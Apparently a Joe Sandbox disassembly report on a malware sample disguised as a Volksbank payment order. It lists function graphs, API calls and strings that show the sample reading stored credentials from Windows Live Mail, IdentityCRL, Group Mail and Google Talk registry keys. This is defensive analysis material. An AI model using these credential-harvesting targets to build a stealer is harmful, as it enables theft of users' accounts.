                                                                                                                                                                                                                                          Function 0044B49F Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 118COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                                                                          • String ID: h4ND
                                                                                                                                                                                                                                          • API String ID: 3662548030-3825183422
                                                                                                                                                                                                                                          • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                                                                                                                                                          • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C
                                                                                                                                                                                                                                          Function 0040FB00 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                                                                                                                                                            • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                                                                                                                                                            • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                                                                                                                                            • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                                                                            • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                                                                            • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                                                                                                          • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                                                                                                                                                          • API String ID: 2768085393-1693574875
                                                                                                                                                                                                                                          • Opcode ID: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                                                                                                                                                          • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                                                                                                                                                                                                          Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0044430B
                                                                                                                                                                                                                                            • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                                                                                                                                            • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                                                                                                                                            • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                                                                                                                                            • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                                                                                                                                            • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                                                                            • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00444379
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00444394
                                                                                                                                                                                                                                            • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                                          • ExpandEnvironmentStringsA.KERNELBASE(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 004443DB
                                                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 00444401
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                                                                                                                                          • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                                                                                                                                          • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                                                                                                                                          • Store Root, xrefs: 004443A5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                                                                                                          • API String ID: 832325562-2578778931
                                                                                                                                                                                                                                          • Opcode ID: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                                                                                                                                                                          • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                                                                                                                                                                                                          Function 0040F460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F567
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F57F
                                                                                                                                                                                                                                            • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                                                                                                                                            • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                                                                                            • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2012582556-3916222277
                                                                                                                                                                                                                                          • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                                                                                                                                                          • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                                                                                                                                                                          Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 331 4037ca-40381c memset * 2 call 444551 334 4038e2-4038e5 331->334 335 403822-403882 call 4021b6 call 406f06 * 2 strchr 331->335 342 403884-403895 _mbscpy 335->342 343 403897-4038a2 strlen 335->343 344 4038bf-4038dd _mbscpy call 4023e5 342->344 343->344 345 4038a4-4038bc sprintf 343->345 344->334 345->344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004037EB
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004037FF
                                                                                                                                                                                                                                            • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                                                                                                                                            • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                                                                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                                            • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                                                                                                          • strchr.MSVCRT ref: 0040386E
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00403897
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 004038B7
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                                                                                          • String ID: %s@yahoo.com
                                                                                                                                                                                                                                          • API String ID: 317221925-3288273942
                                                                                                                                                                                                                                          • Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                                                                                                                                                          • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                                                                                                                                                                                          Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 347 4034e4-403544 memset * 2 call 410b1e 350 403580-403582 347->350 351 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 347->351 351->350
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403504
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040351A
                                                                                                                                                                                                                                            • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                                                                                                                                            • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                                                                            • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040356D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                                                                                                          • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                                                                                                          • API String ID: 3071782539-966475738
                                                                                                                                                                                                                                          • Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                                                                                                                                                          • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                                                                                                                                                                          Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 356 40ccd7-40cd06 ??2@YAPAXI@Z 357 40cd08-40cd0d 356->357 358 40cd0f 356->358 359 40cd11-40cd24 ??2@YAPAXI@Z 357->359 358->359 360 40cd26-40cd2d call 404025 359->360 361 40cd2f 359->361 363 40cd31-40cd57 360->363 361->363 364 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 363->364 365 40cd59-40cd60 DeleteObject 363->365 365->364
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040CD5A
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040CD96
                                                                                                                                                                                                                                          • LoadIconA.USER32(00000065), ref: 0040CDA6
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2054149589-0
                                                                                                                                                                                                                                          • Opcode ID: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                                                                                                                                                          • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                                                                                                                                                                                          Function 0044B40E Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 373 44b40e-44b415 GetModuleHandleA 374 44b455 373->374 375 44b417-44b426 call 44b42b 373->375 376 44b457-44b45b 374->376 385 44b48d 375->385 386 44b428-44b433 GetProcAddress 375->386 378 44b45d-44b465 GetModuleHandleA 376->378 379 44b49a call 44b49f 376->379 381 44b467-44b46f 378->381 381->381 384 44b471-44b474 381->384 384->376 387 44b476-44b478 384->387 388 44b48e-44b496 385->388 386->374 389 44b435-44b442 VirtualProtect 386->389 390 44b47e-44b486 387->390 391 44b47a-44b47c 387->391 397 44b498 388->397 393 44b454 389->393 394 44b444-44b452 VirtualProtect 389->394 395 44b487-44b488 GetProcAddress 390->395 391->395 393->374 394->393 395->385 397->384
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                                                                                                                                            • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                                                                                                                                            • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                                                                            • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2099061454-0
                                                                                                                                                                                                                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                          • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                                                                                                                                                                                                          Function 004085D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                                                                                                                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                                                                                                                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                                                                                                                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                                                                                                                                            • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                                                                            • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                                                                            • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                                                                            • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                                                                            • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                                                                            • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                                                                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408620
                                                                                                                                                                                                                                            • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408671
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
